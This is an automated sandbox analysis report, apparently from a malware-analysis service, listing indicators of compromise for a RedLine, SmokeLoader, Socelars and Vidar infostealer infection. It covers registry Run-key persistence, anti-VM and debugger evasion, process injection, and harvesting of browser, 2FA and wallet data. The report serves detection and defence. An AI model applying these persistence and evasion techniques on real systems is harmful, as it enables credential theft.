redline | c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19

Change Default File Association

T1042

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDriveSetup.exe

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4380	3032	rundll32.exe	65
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5484	3032	rundll32.exe	65
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5184	3032	rundll32.exe	65

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

resource	yara_rule
behavioral8/memory/4272-221-0x0000000004820000-0x000000000483F000-memory.dmp	family_redline
behavioral8/memory/4272-229-0x0000000004B80000-0x0000000004B9E000-memory.dmp	family_redline
behavioral8/memory/5500-453-0x0000000004FF0000-0x00000000054EE000-memory.dmp	family_redline
behavioral8/memory/5856-462-0x000000000041C5EE-mapping.dmp	family_redline

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral8/files/0x000400000001ab1f-175.dat	family_socelars
behavioral8/files/0x000400000001ab1f-152.dat	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3516 created 860	3516	WerFault.exe	106

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2000 created 1524	2000	svchost.exe	230

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral8/memory/4320-222-0x0000000003420000-0x00000000034F1000-memory.dmp	family_vidar
behavioral8/memory/4320-227-0x0000000000400000-0x00000000017F2000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral8/files/0x000400000001ab10-124.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab10-125.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab11-123.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab11-127.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab13-128.dat	aspack_v212_v242
behavioral8/files/0x000400000001ab13-129.dat	aspack_v212_v242

Blocklisted process makes network request 48 IoCs

flow	pid	Process
286	6572	MsiExec.exe
290	6572	MsiExec.exe
293	6572	MsiExec.exe
298	6572	MsiExec.exe
303	6572	MsiExec.exe
307	6572	MsiExec.exe
323	6572	MsiExec.exe
339	6572	MsiExec.exe
351	6572	MsiExec.exe
356	6572	MsiExec.exe
357	6572	MsiExec.exe
358	6572	MsiExec.exe
363	6572	MsiExec.exe
364	6572	MsiExec.exe
369	6572	MsiExec.exe
371	6572	MsiExec.exe
372	6572	MsiExec.exe
374	6572	MsiExec.exe
377	6572	MsiExec.exe
380	6572	MsiExec.exe
383	6572	MsiExec.exe
389	6572	MsiExec.exe
392	6572	MsiExec.exe
394	6572	MsiExec.exe
395	6572	MsiExec.exe
397	6572	MsiExec.exe
400	6572	MsiExec.exe
402	6572	MsiExec.exe
404	6572	MsiExec.exe
405	6572	MsiExec.exe
406	6572	MsiExec.exe
408	6572	MsiExec.exe
414	6572	MsiExec.exe
415	6572	MsiExec.exe
417	6572	MsiExec.exe
420	6572	MsiExec.exe
421	6572	MsiExec.exe
422	6572	MsiExec.exe
425	6572	MsiExec.exe
426	6572	MsiExec.exe
428	6572	MsiExec.exe
429	6572	MsiExec.exe
430	6572	MsiExec.exe
431	6572	MsiExec.exe
432	6572	MsiExec.exe
434	6572	MsiExec.exe
435	6572	MsiExec.exe
436	6572	MsiExec.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	46807GHF____.exe

Executes dropped EXE 57 IoCs

pid	Process
3480	setup_installer.exe
2804	setup_install.exe
4220	Sun05640630a6aa.exe
4272	Sun052bbd8bebd9.exe
4284	Sun059375dac544fc4a.exe
4308	3918119.exe
4320	Sun05ac1b0207d3ff3b8.exe
4332	Sun050462125c7d35.exe
4340	Sun05d60bc3b96248e5.exe
4456	Sun05899db881f67fb29.exe
4492	Sun05fa3b4d2ae56e.exe
4508	Sun054fe19a12cb3.exe
4672	browser_broker.exe
4916	LzmwAqmV.exe
5072	Chrome 5.exe
5088	2257784.exe
4256	491252.exe
4292	PublicDwlBrowser1100.exe
648	2.exe
4356	46807GHF____.exe
860	setup.exe
1124	udptest.exe
1488	setup_2.exe
392	3002.exe
2688	setup_2.tmp
2696	WinHoster.exe
2708	jhuuee.exe
3720	BearVpn 3.exe
4128	setup_2.exe
1068	162210.exe
416	setup_2.tmp
4308	3918119.exe
4744	3002.exe
5264	8917362.exe
5312	7616646.exe
5500	2967757.exe
5752	7869575.exe
5788	4365899.exe
5856	2967757.exe
5408	C3KHKEn~m73GVLA.exE
5512	ultramediaburner.exe
5964	ultramediaburner.tmp
5692	Syvyxexaexu.exe
5464	Kymiqofowae.exe
5936	UltraMediaBurner.exe
4496	services64.exe
3092	GcleanerEU.exe
4220	installer.exe
4272	anyname.exe
1132	gcleaner.exe
4920	16C5.exe
6868	sihost64.exe
6632	28F6.exe
5868	FileSyncConfig.exe
1388	wtbbrhc
6564	wtbbrhc
6904	wtbbrhc

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	162210.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	162210.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	16C5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	16C5.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	Syvyxexaexu.exe

Loads dropped DLL 49 IoCs

pid	Process
2804	setup_install.exe
2804	setup_install.exe
2804	setup_install.exe
2804	setup_install.exe
2804	setup_install.exe
2804	setup_install.exe
2804	setup_install.exe
4672	browser_broker.exe
2688	setup_2.tmp
4896	rundll32.exe
416	setup_2.tmp
4464	rundll32.exe
4464	rundll32.exe
5544	rundll32.exe
4320	Sun05ac1b0207d3ff3b8.exe
4320	Sun05ac1b0207d3ff3b8.exe
4220	installer.exe
4220	installer.exe
4220	installer.exe
5848	MsiExec.exe
5848	MsiExec.exe
5912	rundll32.exe
6572	MsiExec.exe
6572	MsiExec.exe
6572	MsiExec.exe
6572	MsiExec.exe
6572	MsiExec.exe
6572	MsiExec.exe
6572	MsiExec.exe
6572	MsiExec.exe
6572	MsiExec.exe
6572	MsiExec.exe
4220	installer.exe
6572	MsiExec.exe
6572	MsiExec.exe
5436	MsiExec.exe
5436	MsiExec.exe
5436	MsiExec.exe
5436	MsiExec.exe
5436	MsiExec.exe
5436	MsiExec.exe
5436	MsiExec.exe
6572	MsiExec.exe
5868	FileSyncConfig.exe
5868	FileSyncConfig.exe
5868	FileSyncConfig.exe
5868	FileSyncConfig.exe
5868	FileSyncConfig.exe
5868	FileSyncConfig.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	491252.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Internet Explorer\\Horazhyxewe.exe\""	46807GHF____.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""	OneDriveSetup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	162210.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	16C5.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
94	ip-api.com

Drops file in System32 directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90}	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 6D0F6BF28DE299DD	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1068	162210.exe
4920	16C5.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2556 set thread context of 1128	2556	svchost.exe	128
PID 5500 set thread context of 5856	5500	2967757.exe	144
PID 4496 set thread context of 7120	4496	services64.exe	224

Drops file in Program Files directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-7TG8F.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-0RTUO.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File created	C:\Program Files (x86)\FarLabUninstaller\is-MKTCC.tmp	setup_2.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\Internet Explorer\Horazhyxewe.exe	46807GHF____.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files\Internet Explorer\KOPZYUGYSG\ultramediaburner.exe.config	46807GHF____.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\Internet Explorer\Horazhyxewe.exe.config	46807GHF____.exe
File created	C:\Program Files\Internet Explorer\KOPZYUGYSG\ultramediaburner.exe	46807GHF____.exe

Drops file in Windows directory 45 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI891.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA87.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSIF245.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI59E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3C8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI756.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\Installer\f74efe4.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF6BE.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFDDA.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSIF799.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFAB8.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSIF4E6.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI64A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFB65.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFBD4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFCA0.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6D8.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSIF7D9.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSIFD6C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7F3.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSIF535.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f74efe4.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF5B3.tmp	msiexec.exe
File created	C:\Windows\Installer\f74efe7.msi	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	Explorer.EXE
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 15 IoCs

pid	pid_target	Process	procid_target
4924	4492	WerFault.exe	99
1788	860	WerFault.exe	106
2500	4492	WerFault.exe	99
3752	860	WerFault.exe	106
4920	4492	WerFault.exe	99
4924	648	WerFault.exe	107
5184	860	WerFault.exe	106
5368	4492	WerFault.exe	99
5524	860	WerFault.exe	106
5768	860	WerFault.exe	106
5972	5500	WerFault.exe	142
6068	860	WerFault.exe	106
5300	4492	WerFault.exe	99
3516	860	WerFault.exe	106
5272	5088	WerFault.exe	117

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3918119.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3918119.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wtbbrhc
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wtbbrhc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wtbbrhc
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wtbbrhc
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wtbbrhc
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	3918119.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wtbbrhc
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wtbbrhc
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wtbbrhc
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wtbbrhc

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Sun05ac1b0207d3ff3b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Sun05ac1b0207d3ff3b8.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
4956	schtasks.exe
3788	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6420	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
6860	taskkill.exe
5640	taskkill.exe
5832	taskkill.exe
6244	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDriveSetup.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 22 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\16\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\FileSyncClient.AutoPlayHandler.1\CLSID	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}\1.0	OneDriveSetup.exe
